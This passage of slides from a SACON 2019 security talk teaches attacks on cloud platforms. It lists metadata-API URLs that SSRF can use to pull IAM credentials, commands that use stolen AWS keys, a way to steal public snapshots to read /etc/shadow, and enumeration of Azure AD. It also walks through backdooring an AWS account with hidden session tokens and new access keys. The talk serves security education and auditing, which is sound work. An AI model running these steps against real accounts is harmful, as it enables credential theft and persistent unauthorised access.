  • 25. SACON 2019 Attacking Metadata API • SSRF or URL fetch • If you only have control over URL parameter then AWS will work • For GCP • Query /v1beta1/ Metadata-flavour: google header was enforced in v1 • For Azure header is a must hence SSRF attack might not work • Code Execution • Make curl calls directly to the metadata API Useful URL’s: • AWS • To fetch Security Credentials: http://169.254.169.254/latest/user-data/iam/security-credentials/<rolename> • GCP • Root password: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json • Kube env: http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env More Cloud Metadata URL’s useful for SSRF Testing : https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb
  • 26. SACON 2019 What next? • So we obtained Credentials, what next? $ export AWS_ACCESS_KEY_ID=AKIAI44QH8DHBEXAMPLE $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...<remainder of security token> $ aws ec2 describe-instances --region us-east-1 Enumerating Permissions (nimbostratus) https://github.com/andresriancho/nimbostratus Ref: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_use-resources.html GCP http://carnal0wnage.attackresearch.com/2019/01/i-found-gcp-service-account-tokennow.html?m=1
  • 27. SACON 2019 Demo • How to interact with Metadata API • How to fetch the Token • How to use AWS command line and use obtained tokens • Enumerate various privileges on the token using nimbostratus • Limitations of Nimbostratus
  • 28. SACON 2019 Cloud storage • Almost all of the cloud service provider gives access to some sort of file storage on steroids • S3 by AWS does more then just file storage can also host static websites • Major Attack Surface revolve around incorrect permissions • Buckets publicly accessible • Writable by many non-required users / roles • Bruteforcable / Guessable names Tips: • To host website AWS wants bucketname == CNAME) • If you access s3.storage.com url’s you will be directed to specific region where it hosted
  • 29. SACON 2019 Cloud storage: Bruteforcing Bucket names Storage enumeration is possible as names are unique in nature Automated tools • https://github.com/digininja/CloudStorageFinder (AWS, Digital Ocean) • https://blog.netspi.com/anonymously-enumerating-azure-file-resources/ (Azure) • https://github.com/NetSPI/MicroBurst (Azure) • https://github.com/appsecco/spaces-finder (Digital Ocean) • https://github.com/0xSearches/sandcastle (AWS S3)
  • 30. SACON 2019 Cloud storage: Commandline • Identify List of buckets in S3 $ aws s3api list-buckets --query "Buckets[].Name" • Check if the bucket is publicaly accessible $ aws s3 ls s3://<bucketname> --no-sign-request • Action on s3 bucket $ aws s3 ls/cp/mv/rm s3://<bucketname>/file [<other_location>] • GCP Storage gsutil ls -r gs://<bucketname> • Azure Storage az storage blob list --container-name $container_name --output table
  • 31. SACON 2019 Cloud storage: Demo • Access buckets via aws s3 cmd • How to check if bucket is publicly accessible • How to enumerate various bucket names
  • 32. SACON 2019 Cloud Snapshots Cloud Snapshots are very very IaaS focused attack surface Consider them like a disk image copy of the cloud instance Snapshots can be retrieved and depending on the configuration attached to other VM’s. Once disk is attached to other VM we have bypassed all the logical checks on the system and should be in a position to access confidential items like • /etc/shadow • Windows SAM File • Confidential files kept on filesystem
  • 33. SACON 2019 Owning Cloud Snapshots 1. Get caller id: aws sts get-caller-identity 2. Describe snapshots aws ec2 describe-snapshots --owner-id <get from get-caller- identity> 3. You can get list of every public snapshot by aws ec2 describe-snapshots –region us- east-1 4. Load snapshot in own account 1. Create a volume aws --profile YOUR_ACCOUNT ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-id 2. Attach volume to linux machine and inside linux machine run cmd to access it at /mnt sudo mount /dev/xvdb1 /mnt Ref: https://securosis.com/blog/cloud-forensics-101
  • 34. SACON 2019 Azure AD Attacks • Azure AD is a hosted AD Solution allows organizations to leverage hybrid approach where two AD’s on prem and Azure AD can be in sync. Which also means if on prem is not compromised but Azure AD got owned they have all creds. • Even if you have only office 365 you are part of Azure AD and can interact via azure-cli • Assuming you have a valid cred you can get User Details : az ad user list --output=table -- query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Email:mai l,UserId:mailNickname,Enabled:accountEnabled}’ • All service principals az ad sp list --output=table -- query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisher Name,MetadataURL:samlMetadataUrl}’ https://adsecurity.org/wp-content/uploads/2017/07/2017-DEFCON-HackingTheCloud-SteereMetcalf-Final.pdf More: https://hunter2.gitbook.io/darthsidious/enumeration/azure-enumeration and https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
  • 35. SACON 2019 Attacking Serverless We have created a sample webpage where we are running commands on two different serverless environments AWS and GCP. Instead of talking lets have a quick demo of how Serverless could be the start attack point and what differs where • Tips: AWS lambda doesn’t have metadata API access but does carry creds in environment variables /proc/self/environ Refer: https://www.owasp.org/images/5/5c/OWASP-Top-10-Serverless-Interpretation- en.pdf
  • 36. SACON 2019 Attacking IAM Service IAM services are very core to the cloud services We have already seen various attack scenario’s leveraging roles and credentials For specific to IAM scenario’s I wanted to talk about two essential topics • Dormant Resources • Shadow Admins Dormant resources are those IAM roles and creds who were once created but are now not active or created but never used and hence never monitored or cared for. (although it applies to servers also but those have impact only on money not access) TIPS: aws sts get-session-token --duration-seconds 129600 creates a backdoor token not listed anywhere not visible in aws iam list-access-keys
  • 37. SACON 2019 Shadow Admins • CreateAccessKey : create a new access key to another IAM admin account • CreateLoginProfile : The attacker can add a new password-based login profile, set a new password for that entity, impersonate it and execute the intended malicious action on behalf of the compromised user. • UpdateLoginProfile : permission to reset other IAM users’ login passwords. • AttachUserPolicy, AttachGroupPolicy or AttachRolePolicy : permissions could attach existing admin policy to any other entity • PutUserPolicy, PutGroupPolicy or PutRolePolicy : permits the attacker to add “inline” policies to other entities, The newly added inline policy defined by the attacker will allow the attacker to grant additional privileges other entities • CreatePolicy : the attacker could add a stealthy admin policy • AddUserToGroup : an attacker could add user directly into the admin group • UpdateAssumeRolePolicy : an attacker can assume permissions of a privileged account • CreatePolicyVersion, SetDefaultPolicyVersion : change a non-privileged entity to be a privileged one. • PassRole with CreateInstanceProfile/AddRoleToInstanceProfile : attacker could create a new privileged instance profile Ref: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ And https://github.com/duo-labs/cloudtracker
  • 38. SACON 2019 Case study: Backdooring AWS Account Starting point: Compromised AWS credentials Exploitation Process: 1. Persist: aws sts get-session-token --duration-seconds 129600 2. Approach 1: Create user 1. aws iam create-user --user-name [my-user] 2. aws iam create-access-key --user-name [my-user] 3. Approach 2: Create just access key using 1. aws iam create-access-key --user-name [existing-user] 4. For future: Lambda function to trigger on new user creation and send you a access key 5. Approach 3: create a new role attach it to existing role 1. aws iam create-role and aws iam attach-role-policy 6. For future: lambda function to trigger on new role creation and add your backdoor 7. Failsafe: use UpdateAssumeRolePolicy trigger to read backdoors Ref: https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9
  • 39. SACON 2019 Auditing Tools 1. As an authorized person take the API Key with security permissions and audit 2. As an attacker when you obtain a key run it via auditing tools to see if you can spot some easy wins. For item 1, Bunch of different options cs-suite is my fav, just run it once and get most of the common reports in one shot. But the versions might be a bit old so if you want prefer running individual scans separately also. example scout2 is older in cs-suite Reports for most of them are difficult to read for the first time. Second scenario is tricky, tools are made with assumption that all commands will work but that’s not necessarily the case. Mostly commands will fail in second case. Only tool made with that in mind seems to be nimbostratus however its pretty limited. Example it can’t find if s3 permissions are available to you.
  • 40. SACON 2019 References and Tools • Amazon Web Services — a practical guide https://github.com/open-guides/og-aws • Pacu Attack framework: https://github.com/RhinoSecurityLabs/pacu • Cloud resource mapping and visualizing : https://github.com/duo-labs/cloudmapper • Practice environments • http://flaws.cloud • http://flaws2.cloud • Serverless Practice environments • https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service • http://github.com/puresec/Serverless-Goat • https://github.com/torque59/AWS-Vulnerable-Lambda • Keep your login creds safe – https://docs.aws.amazon.com/opsworks/latest/userguide/security-ssh-access.html – https://aws.amazon.com/articles/tips-for-securing-your-ec2-instance/
  • 41. SACON 2019 More References and Tools • Hardening Guidelines – https://www.cisecurity.org/benchmark/amazon_web_services/ – https://www.cisecurity.org/benchmark/azure/ – https://www.cisecurity.org/benchmark/google_cloud_computing_platform/ • Cloud Account Audit's – https://github.com/SecurityFTW/cs-suite (Cross provider) – https://github.com/toniblyx/prowler (AWS) – https://github.com/cyberark/SkyArk (AWS) – https://github.com/nccgroup/Scout2 (AWS) – https://github.com/nccgroup/G-Scout (GCP) – https://github.com/nccgroup/azucar (Azure) – https://github.com/mwrlabs/Azurite (Azure) • Another Case Study: https://www.threatstack.com/cloud-attack • IaaS systems need more then just cloud level probing, perform OS level Audit's – https://github.com/lateralblast/lunar (Linux) – https://github.com/CISOfy/lynis (Linux)
  • 42. SACON 2019 Thank You If you need help feel free to contact anant@anantshri.info anant@notsosecure.com